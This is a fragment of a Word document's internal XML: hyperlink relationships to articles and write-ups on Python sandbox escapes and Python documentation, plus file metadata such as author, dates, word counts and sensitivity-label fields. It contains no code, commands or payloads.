Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://book.hacktricks.xyz/generic-methodologies-and-resources/python/bypass-python-sandboxes" TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://lbarman.ch/blog/pyjail/" TargetMode="External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book.hacktricks.xyz/generic-methodologies-and-resources/python/bypass-python-sandboxes" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://book.hacktricks.xyz/generic-methodologies-and-resources/python/python-internal-read-gadgets" TargetMode="External"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nedbatchelder.com/blog/201206/eval_really_is_dangerou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glossary.html" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://book.hacktricks.xyz/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/.pyc" TargetMode="External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docs.python.org/3/library/functions.html" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.decompiler.com/" TargetMode="External"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://gynvael.coldwind.pl/n/python_sandbox_escape" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.arkark.dev/2022/11/18/seccon-en/" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pyformat.info/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heckoway.net/musings/pickle/" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.python.org/2/library/functions.html" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://book.hacktricks.xyz/generic-methodologies-and-resources/python/bypass-python-sandboxes" TargetMode="External"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.delroth.net/2013/03/escaping-a-python-sandbox-ndh-2013-quals-writeup/" TargetMode="External"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://infosecwriteups.com/how-assertions-can-get-you-hacked-da22c84fb8f6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docs.qubole.com/en/latest/user-guide/package-management/pkgmgmt-preinstalled-packa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8866</Words>
  <Characters>50542</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>421</Lines>
  <Paragraphs>118</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>59290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Bhabesh Kumar Das</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Bhabesh Kumar Das</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-07-07T07:58:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-07-07T07:59:00Z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#626469,6,Calibri</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="ClassificationContentMarkingFooterText">
    <vt:lpwstr>General</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="5" name="MSIP_Label_57443d00-af18-408c-9335-47b5de3ec9b9_Enabled">
    <vt:lpwstr>true</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="6" name="MSIP_Label_57443d00-af18-408c-9335-47b5de3ec9b9_SetDate">
    <vt:lpwstr>2024-07-07T07:58:20Z</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="7" name="MSIP_Label_57443d00-af18-408c-9335-47b5de3ec9b9_Method">
    <vt:lpwstr>Privileged</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="8" name="MSIP_Label_57443d00-af18-408c-9335-47b5de3ec9b9_Name">
    <vt:lpwstr>General v2</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="9" name="MSIP_Label_57443d00-af18-408c-9335-47b5de3ec9b9_SiteId">
    <vt:lpwstr>6e51e1ad-c54b-4b39-b598-0ffe9ae68fef</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="10" name="MSIP_Label_57443d00-af18-408c-9335-47b5de3ec9b9_ActionId">
    <vt:lpwstr>696b3667-195c-416d-942d-7042d2565e7e</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="11" name="MSIP_Label_57443d00-af18-408c-9335-47b5de3ec9b9_ContentBits">
    <vt:lpwstr>2</vt:lpwstr>
  </property>
</Properties>
</file>